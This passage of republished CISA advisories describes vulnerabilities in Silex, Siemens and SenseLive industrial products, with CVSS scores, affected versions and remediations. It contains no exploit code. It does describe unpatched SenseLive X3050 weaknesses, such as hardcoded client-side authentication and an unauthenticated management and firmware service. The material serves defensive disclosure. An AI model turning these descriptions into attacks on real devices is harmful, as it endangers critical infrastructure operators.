(https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-93 Improper Neutralization of CRLF Sequences ('CRLF Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L CVE-2026-32965 An Initialization of a Resource with an Insecure Default vulnerability in Silex Technology SD-330AC and AMC Manager could allow an attacker using the factory default configuration to configure the device using the null string password. View CVE Details Affected Products Silex Technology SD-330AC and AMC Manager Vendor: Silex Technology Product Version: Silex Technology SD-330AC: <=1.42, Silex Technology AMC Manager: <=5.0.2 Product Status: known_affected Remediations Vendor fix The developer has released the following versions to address this vulnerability: SD-330AC firmware Ver 1.50 or later Vendor fix AMC Manager Ver.5.1.0 or later Mitigation CVE-2026-32958 and CVE-2026-32965: Set a password for the settings web interface. Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/en/2026-001 Mitigation For more information, see Silex Technology's security advisory in English (https://www.silex.jp/support/security-advisories/en/2026-001) or in Japanese (https://www.silex.jp/support/security-advisories/2026-001). https://www.silex.jp/support/security-advisories/2026-001 Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/en/vu/JVNVU94271449/ Mitigation For more information, see JPCERT/CC vulnerability notes in English (https://jvn.jp/en/vu/JVNVU94271449/) or in Japanese (https://jvn.jp/vu/JVNVU94271449/). https://jvn.jp/vu/JVNVU94271449/ Relevant CWE: CWE-1188 Initialization of a Resource with an Insecure Default Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N Acknowledgments Francesco La Spina of Forescout Technologies reported these vulnerabilities to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. Revision History Initial Release Date: 2026-04-21 Date Revision Summary 2026-04-21 1 Initial Publication Legal Notice and Terms of Use

View CSAF Summary RUGGEDCOM CROSSBOW Secure Access Manager Primary (SAM-P) contains a vulnerability that could allow an attacker to escalate their own privileges. Siemens has released a new version for RUGGEDCOM CROSSBOW Secure Access Manager Primary (SAM-P) and recommends to update to the latest version. The following versions of Siemens RUGGEDCOM CROSSBOW Secure Access Manager Primary are affected: RUGGEDCOM CROSSBOW Secure Access Manager Primary (SAM-P) vers:intdot/<5.8 (CVE-2026-27668) CVSS Vendor Equipment Vulnerabilities v3 8.8 Siemens Siemens RUGGEDCOM CROSSBOW Secure Access Manager Primary Incorrect Privilege Assignment Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2026-27668 User Administrators are allowed to administer groups they belong to. This could allow an authenticated User Administrator to escalate their own privileges and grant themselves access to any device group at any access level. View CVE Details Affected Products Siemens RUGGEDCOM CROSSBOW Secure Access Manager Primary Vendor: Siemens Product Version: RUGGEDCOM CROSSBOW Secure Access Manager Primary (SAM-P) Product Status: known_affected Remediations Vendor fix Update to V5.8 or later version https://support.industry.siemens.com/cs/ww/en/view/110000841/ Relevant CWE: CWE-266 Incorrect Privilege Assignment Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Acknowledgments Siemens ProductCERT reported this vulnerability to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-741509 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-04-14 Date Revision Summary 2026-04-14 1 Publication Date 2026-04-21 2 Initial CISA Republication of Siemens ProductCERT SSA-741509 advisory Legal Notice and Terms of Use

View CSAF Summary The products listed below contain a vulnerability that could allow an attacker to perform an out-of-bound read, potentially leading to information disclosure or denial of service of the TPM. Siemens has released new versions for several affected products and recommends to update to the latest versions. Siemens is preparing further fix versions and recommends countermeasures for products where fixes are not, or not yet available. The following versions of Siemens TPM 2.0 are affected: SIMATIC CN 4100 vers:all/* (CVE-2025-2884) SIMATIC Field PG M5 vers:all/* (CVE-2025-2884) SIMATIC Field PG M6 vers:all/* (CVE-2025-2884) SIMATIC IPC BX-32A vers:intdot/<29.01.09 (CVE-2025-2884) SIMATIC IPC BX-39A vers:intdot/<29.01.09 (CVE-2025-2884) SIMATIC IPC BX-56A vers:intdot/<32.01.09 (CVE-2025-2884) SIMATIC IPC BX-59A vers:intdot/<32.01.09 (CVE-2025-2884) SIMATIC IPC MD-57A vers:intdot/<30.01.10 (CVE-2025-2884) SIMATIC IPC PX-32A vers:intdot/<29.01.09 (CVE-2025-2884) SIMATIC IPC PX-39A vers:intdot/<29.01.09 (CVE-2025-2884) SIMATIC IPC PX-39A PRO vers:intdot/<29.01.09 (CVE-2025-2884) SIMATIC IPC RW-528A vers:intdot/<34.01.02 (CVE-2025-2884) SIMATIC IPC RW-548A vers:intdot/<34.01.02 (CVE-2025-2884) SIMATIC IPC227E vers:all/* (CVE-2025-2884) SIMATIC IPC277E vers:all/* (CVE-2025-2884) SIMATIC IPC427E vers:intdot/<21.01.20 (CVE-2025-2884) SIMATIC IPC477E vers:intdot/<21.01.20 (CVE-2025-2884) SIMATIC IPC477E PRO vers:intdot/<21.01.20 (CVE-2025-2884) SIMATIC IPC627E vers:all/* (CVE-2025-2884) SIMATIC IPC647E vers:all/* (CVE-2025-2884) SIMATIC IPC677E vers:all/* (CVE-2025-2884) SIMATIC IPC847E vers:all/* (CVE-2025-2884) SIMATIC ITP1000 vers:all/* (CVE-2025-2884) SIPLUS IPC427E vers:intdot/<21.01.20 (CVE-2025-2884) CVSS Vendor Equipment Vulnerabilities v3 6.6 Siemens Siemens TPM 2.0 Out-of-bounds Read Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2025-2884 TCG TPM2.0 Reference implementation's CryptHmacSign helper function is vulnerable to Out-of-Bounds read due to the lack of validation the signature scheme with the signature key's algorithm. See Errata Revision 1.83 and advisory TCGVRT0009 for TCG standard TPM2.0 View CVE Details Affected Products Siemens TPM 2.0 Vendor: Siemens Product Version: SIMATIC CN 4100, SIMATIC Field PG M5, SIMATIC Field PG M6, SIMATIC IPC BX-32A, SIMATIC IPC BX-39A, SIMATIC IPC BX-56A, SIMATIC IPC BX-59A, SIMATIC IPC MD-57A, SIMATIC IPC PX-32A, SIMATIC IPC PX-39A, SIMATIC IPC PX-39A PRO, SIMATIC IPC RW-528A, SIMATIC IPC RW-548A, SIMATIC IPC227E, SIMATIC IPC277E, SIMATIC IPC427E, SIMATIC IPC477E, SIMATIC IPC477E PRO, SIMATIC IPC627E, SIMATIC IPC647E, SIMATIC IPC677E, SIMATIC IPC847E, SIMATIC ITP1000, SIPLUS IPC427E Product Status: known_affected Remediations No fix planned Currently no fix is planned None available Currently no fix is available Vendor fix Update to V21.01.20 or later version https://support.industry.siemens.com/cs/ww/en/view/109763408/ Vendor fix Update to V29.01.09 or later version https://support.industry.siemens.com/cs/ww/en/view/109763408/ Vendor fix Update to V30.01.10 or later version https://support.industry.siemens.com/cs/ww/en/view/109763408/ Vendor fix Update to V32.01.09 or later version https://support.industry.siemens.com/cs/ww/en/view/109763408/ Vendor fix Update to V34.01.02 or later version https://support.industry.siemens.com/cs/ww/en/view/109763408/ Relevant CWE: CWE-125 Out-of-bounds Read Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.6 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:H Acknowledgments Siemens ProductCERT reported this vulnerability to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-628843 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-04-14 Date Revision Summary 2026-04-14 1 Publication Date 2026-04-21 2 Initial CISA Republication of Siemens ProductCERT SSA-628843 advisory Legal Notice and Terms of Use

View CSAF Summary Successful exploitation of these vulnerabilities could allow an attacker to take complete control of the device. The following versions of SenseLive X3050 are affected: X3050 V1.523 (CVE-2026-40630, CVE-2026-25720, CVE-2026-35503, CVE-2026-39462, CVE-2026-27843, CVE-2026-40431, CVE-2026-40623, CVE-2026-27841, CVE-2026-40620, CVE-2026-35064, CVE-2026-25775) CVSS Vendor Equipment Vulnerabilities v3 9.8 SenseLive SenseLive X3050 Authentication Bypass Using an Alternate Path or Channel, Insufficient Session Expiration, Use of Hard-coded Credentials, Insufficiently Protected Credentials, Missing Authentication for Critical Function, Cleartext Transmission of Sensitive Information, Missing Authorization, Cross-Site Request Forgery (CSRF) Background Critical Infrastructure Sectors: Critical Manufacturing, Water and Wastewater, Energy, Information Technology Countries/Areas Deployed: Worldwide Company Headquarters Location: India Vulnerabilities Expand All + CVE-2026-40630 A vulnerability in the X3050's web management interface allows unauthorized access to certain configuration endpoints due to improper access control enforcement. An attacker with network access to the device may be able to bypass the intended authentication mechanism and directly interact with sensitive configuration functions. View CVE Details Affected Products SenseLive X3050 Vendor: SenseLive Product Version: SenseLive X3050: V1.523 Product Status: known_affected Remediations Mitigation SenseLive did not respond to CISA's requests to coordinate. Affected users are encouraged to reach out to SenseLive for more information. https://senselive.io/contact https://senselive.io/contact Relevant CWE: CWE-288 Authentication Bypass Using an Alternate Path or Channel Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2026-25720 A vulnerability exists in the X3050's web management interface due to improper session lifetime enforcement, allowing authenticated sessions to remain active for extended periods without requiring re-authentication. An attacker with access to a previously authenticated session could continue interacting with administrative functions long after legitimate user activity has ceased. View CVE Details Affected Products SenseLive X3050 Vendor: SenseLive Product Version: SenseLive X3050: V1.523 Product Status: known_affected Remediations Mitigation SenseLive did not respond to CISA's requests to coordinate. Affected users are encouraged to reach out to SenseLive for more information. https://senselive.io/contact https://senselive.io/contact Relevant CWE: CWE-613 Insufficient Session Expiration Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N CVE-2026-35503 A vulnerability in the X3050's web management interface allows authentication logic to be performed entirely on the client side, relying on hardcoded values within browser-executed scripts rather than server-side verification. An attacker with access to the login page could retrieve these exposed parameters and gain unauthorized access to administrative functionality. View CVE Details Affected Products SenseLive X3050 Vendor: SenseLive Product Version: SenseLive X3050: V1.523 Product Status: known_affected Remediations Mitigation SenseLive did not respond to CISA's requests to coordinate. Affected users are encouraged to reach out to SenseLive for more information. https://senselive.io/contact https://senselive.io/contact Relevant CWE: CWE-798 Use of Hard-coded Credentials Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2026-39462 A vulnerability exists in the X3050's web management interface in which password updates are not reliably applied due to improper handling of credential changes on the backend. After the device undergoes a factory restore using the SenseLive Config 2.0 tool, the interface may indicate that the password update was successful; however, the system may continue to accept the previous or default credentials, demonstrating that the password-change process is not consistently enforced. Even after a factory reset, attempted password changes may fail to propagate correctly. View CVE Details Affected Products SenseLive X3050 Vendor: SenseLive Product Version: SenseLive X3050: V1.523 Product Status: known_affected Remediations Mitigation SenseLive did not respond to CISA's requests to coordinate. Affected users are encouraged to reach out to SenseLive for more information. https://senselive.io/contact https://senselive.io/contact Relevant CWE: CWE-522 Insufficiently Protected Credentials Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.1 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2026-27843 A vulnerability exists in the X3050's web management interface that allows critical configuration parameters to be modified without sufficient authentication or server-side validation. By applying unsupported or disruptive values to recovery mechanisms and network settings, an attacker can induce a persistent lockout state. Because the device lacks a physical reset button, recovery requires specialized technical access via the console to perform a factory reset, resulting in a total denial-of-service for the gateway and its connected RS-485 downstream systems. View CVE Details Affected Products SenseLive X3050 Vendor: SenseLive Product Version: SenseLive X3050: V1.523 Product Status: known_affected Remediations Mitigation SenseLive did not respond to CISA's requests to coordinate. Affected users are encouraged to reach out to SenseLive for more information. https://senselive.io/contact https://senselive.io/contact Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H CVE-2026-40431 A vulnerability exists in the X3050's web management interface due to its reliance on unencrypted HTTP for all administrative communication. Because management traffic, including authentication attempts and configuration data, is transmitted in cleartext, an attacker with access to the same network segment could intercept or observe sensitive operational information. View CVE Details Affected Products SenseLive X3050 Vendor: SenseLive Product Version: SenseLive X3050: V1.523 Product Status: known_affected Remediations Mitigation SenseLive did not respond to CISA's requests to coordinate. Affected users are encouraged to reach out to SenseLive for more information. https://senselive.io/contact https://senselive.io/contact Relevant CWE: CWE-319 Cleartext Transmission of Sensitive Information Metrics CVSS Version Base Score Base Severity Vector String 3.1 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N CVE-2026-40623 A vulnerability in the X3050's web management interface allows critical system and network configuration parameters to be modified without sufficient validation and safety controls. Due to inadequate enforcement of constraints on sensitive functions, parameters such as IP addressing, watchdog timers, reconnect intervals, and service ports can be set to unsupported or unsafe values. These configuration changes directly affect core device behaviour and recovery mechanisms. The lack of proper validation and safeguards allows critical system functions to be altered in a manner that can destabilize device operation or render the device persistently unavailable. View CVE Details Affected Products SenseLive X3050 Vendor: SenseLive Product Version: SenseLive X3050: V1.523 Product Status: known_affected Remediations Mitigation SenseLive did not respond to CISA's requests to coordinate. Affected users are encouraged to reach out to SenseLive for more information. https://senselive.io/contact https://senselive.io/contact Relevant CWE: CWE-862 Missing Authorization Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H CVE-2026-27841 A vulnerability in the X3050's web management interface allows state-changing operations to be triggered without proper Cross-Site Request Forgery (CSRF) protections. Because the application does not enforce server-side validation of request origin or implement CSRF tokens, a malicious external webpage could cause a user's browser to submit unauthorized configuration requests to the device. View CVE Details Affected Products SenseLive X3050 Vendor: SenseLive Product Version: SenseLive X3050: V1.523 Product Status: known_affected Remediations Mitigation SenseLive did not respond to CISA's requests to coordinate. Affected users are encouraged to reach out to SenseLive for more information. https://senselive.io/contact https://senselive.io/contact Relevant CWE: CWE-352 Cross-Site Request Forgery (CSRF) Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H CVE-2026-40620 A vulnerability in the X3050's embedded management service allows full administrative control to be established without any form of authentication or authorization on the SenseLive config application. The service accepts management connections from any reachable host, enabling unrestricted modification of critical configuration parameters, operational modes, and device state through a vendor-supplied or compatible client. View CVE Details Affected Products SenseLive X3050 Vendor: SenseLive Product Version: SenseLive X3050: V1.523 Product Status: known_affected Remediations Mitigation SenseLive did not respond to CISA's requests to coordinate. Affected users are encouraged to reach out to SenseLive for more information. https://senselive.io/contact https://senselive.io/contact Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVE-2026-35064 A vulnerability in the X3050's management ecosystem allows unauthenticated discovery of deployed units through the vendor's management protocol, enabling identification of device presence, identifiers, and management interfaces without requiring credentials. Because discovery functions are exposed by the underlying service rather than gated by authentication, an attacker on the same network segment can rapidly enumerate targeted devices. View CVE Details Affected Products SenseLive X3050 Vendor: SenseLive Product Version: SenseLive X3050: V1.523 Product Status: known_affected Remediations Mitigation SenseLive did not respond to CISA's requests to coordinate. Affected users are encouraged to reach out to SenseLive for more information. https://senselive.io/contact https://senselive.io/contact Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVE-2026-25775 A vulnerability in X3050's remote management service allows firmware retrieval and update operations to be performed without authentication or authorization. The service accepts firmware-related requests from any reachable host and does not verify user privileges, integrity of uploaded images, or the authenticity of provided firmware. View CVE Details Affected Products SenseLive X3050 Vendor: SenseLive Product Version: SenseLive X3050: V1.523 Product Status: known_affected Remediations Mitigation SenseLive did not respond to CISA's requests to coordinate. Affected users are encouraged to reach out to SenseLive for more information. https://senselive.io/contact https://senselive.io/contact Relevant CWE: CWE-306 Missing Authentication for Critical Function Metrics CVSS Version Base Score Base Severity Vector String 3.1 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Acknowledgments Jithin Nambiar J reported these vulnerabilities to CISA Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolating them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. CISA also recommends users take the following measures to protect themselves from social engineering attacks: Do not click web links or open attachments in unsolicited email messages. Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams. Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks. No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time. Revision History Initial Release Date: 2026-04-21 Date Revision Summary 2026-04-21 1 Initial Publication Legal Notice and Terms of Use

View CSAF Summary Multiple Siemens applications are affected by improper certificate validation in Siemens Analytics Toolkit. This could allow an unauthenticated remote attacker to perform man in the middle attacks. Siemens has released new versions for the affected products and recommends to update to the latest versions. The following versions of Siemens Analytics Toolkit are affected: Siemens Software Center vers:intdot/<3.5.8.2 (CVE-2025-40745) Simcenter 3D vers:intdot/<2506.6000 (CVE-2025-40745) Simcenter Femap vers:intdot/<2506.0002 (CVE-2025-40745) Simcenter STAR-CCM+ vers:intdot/<2602 (CVE-2025-40745) Solid Edge SE2025 Solid Edge SE2026 Tecnomatix Plant Simulation vers:intdot/<2504.0008 (CVE-2025-40745) CVSS Vendor Equipment Vulnerabilities v3 3.7 Siemens Siemens Analytics Toolkit Improper Certificate Validation Background Critical Infrastructure Sectors: Critical Manufacturing Countries/Areas Deployed: Worldwide Company Headquarters Location: Germany Vulnerabilities Expand All + CVE-2025-40745 Affected applications do not properly validate client certificates to connect to Analytics Service endpoint. This could allow an unauthenticated remote attacker to perform man in the middle attacks. View CVE Details Affected Products Siemens Analytics Toolkit Vendor: Siemens Product Version: Siemens Software Center, Simcenter 3D, Simcenter Femap, Simcenter STAR-CCM+, Solid Edge SE2025, Solid Edge SE2026, Tecnomatix Plant Simulation Product Status: known_affected Remediations Vendor fix Update to V225.0 Update 13 or later version https://support.sw.siemens.com/product/246738425/ Vendor fix Update to V226.0 Update 04 or later version https://support.sw.siemens.com/product/246738425/ Vendor fix Update to V2504.0008 or later version https://support.sw.siemens.com/product/297028302/ Vendor fix Update to V2506.0002 or later version https://support.sw.siemens.com/product/275652363/ Vendor fix Update to V2506.6000 or later version https://support.sw.siemens.com/product/289054037/ Vendor fix Update to V2602 or later version https://support.sw.siemens.com/product/226870983/ Vendor fix Update to V3.5.8.2 or later version https://www.sw.siemens.com/en-US/siemens-software-center/ Relevant CWE: CWE-295 Improper Certificate Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 3.7 LOW CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N Acknowledgments Siemens ProductCERT reported this vulnerability to CISA. General Recommendations As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity Additional Resources For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories Terms of Use The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use. Legal Notice and Terms of Use This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy & Use policy (https://www.cisa.gov/privacy-policy). Recommended Practices CISA recommends users take defensive measures to minimize the exploitation risk of these vulnerabilities. Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet. Locate control system networks and remote devices behind firewalls and isolate them from business networks. When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices. CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents. Advisory Conversion Disclaimer This ICSA is a verbatim republication of Siemens ProductCERT SSA-981622 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory. Revision History Initial Release Date: 2026-04-14 Date Revision Summary 2026-04-14 1 Publication Date 2026-04-21 2 Initial CISA Republication of Siemens ProductCERT SSA-981622 advisory Legal Notice and Terms of Use

